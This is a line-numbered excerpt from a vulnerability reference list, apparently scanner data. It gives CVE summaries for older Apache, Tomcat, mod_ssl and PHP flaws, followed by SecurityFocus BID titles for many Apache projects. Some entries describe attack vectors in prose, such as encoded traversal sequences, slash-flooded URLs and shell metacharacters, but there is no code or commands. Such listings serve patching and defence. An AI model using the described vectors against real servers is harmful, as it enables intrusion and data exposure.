6049| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
6050| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
6051| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
6052| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
6053| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
6054| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
6055| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
6056| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
6057| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
6058| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
6059| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
6060| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
6061| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
6062| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
6063| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
6064| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
6065| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
6066| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
6067| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
6068| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
6069| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
6070| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
6071| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
6072| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
6073| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
6074| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
6075| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
6076| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
6077| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
6078| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
6079| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
6080| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
6081| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
6082| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
6083| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
6084| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
6085| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
6086| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
6087| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
6088| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
6089| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
6090| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
6091| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
6092| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
6093| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
6094| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
6095| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
6096| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
6097| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
6098| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
6099| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
6100| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
6101| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
6102| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
6103| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
6104| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
6105| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
6106| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
6107| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
6108| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
6109| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
6110| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
6111| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
6112| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
6113| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
6114| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
6115| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
6116| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
6117| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
6118| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
6119| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
6120| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
6121| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
6122| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
6123| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
6124| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
6125| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
6126| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
6127| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
6128| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
6129| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
6130| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
6131| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
6132| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
6133| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
6134| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
6135| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
6136|
6137| SecurityFocus - https://www.securityfocus.com/bid/:
6138| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
6139| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
6140| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
6141| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
6142| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
6143| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
6144| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
6145| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
6146| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
6147| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
6148| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
6149| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
6150| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
6151| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
6152| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
6153| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
6154| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
6155| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
6156| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
6157| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
6158| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
6159| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
6160| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
6161| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
6162| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
6163| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
6164| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
6165| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
6166| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
6167| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
6168| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
6169| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
6170| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
6171| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
6172| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
6173| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
6174| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
6175| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
6176| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
6177| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
6178| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
6179| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
6180| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
6181| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
6182| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
6183| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
6184| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
6185| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
6186| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
6187| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
6188| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
6189| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
6190| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
6191| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
6192| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
6193| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
6194| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
6195| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
6196| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
6197| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
6198| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
6199| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
6200| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
6201| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
6202| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
6203| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
6204| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
6205| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
6206| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
6207| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
6208| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
6209| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
6210| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
6211| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
6212| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
6213| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
6214| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
6215| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
6216| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
6217| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
6218| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
6219| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
6220| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
6221| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
6222| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
6223| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
6224| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
6225| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
6226| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
6227| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
6228| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
6229| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
6230| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
6231| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
6232| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
6233| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
6234| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
6235| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
6236| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
6237| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
6238| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
6239| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
6240| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
6241| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
6242| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
6243| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
6244| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
6245| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
6246| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
6247| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
6248| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
6249| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
6250| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
6251| [100447] Apache2Triad Multiple Security Vulnerabilities
6252| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
6253| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
6254| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
6255| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
6256| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
6257| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
6258| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
6259| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
6260| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
6261| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
6262| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
6263| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
6264| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
6265| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
6266| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
6267| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
6268| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
6269| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
6270| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
6271| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
6272| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
6273| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
6274| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
6275| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
6276| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
6277| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
6278| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
6279| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
6280| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
6281| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
6282| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
6283| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
6284| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
6285| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
6286| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
6287| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
6288| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
6289| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
6290| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
6291| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
6292| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
6293| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
6294| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
6295| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
6296| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
6297| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
6298| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
6299| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
6300| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
6301| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
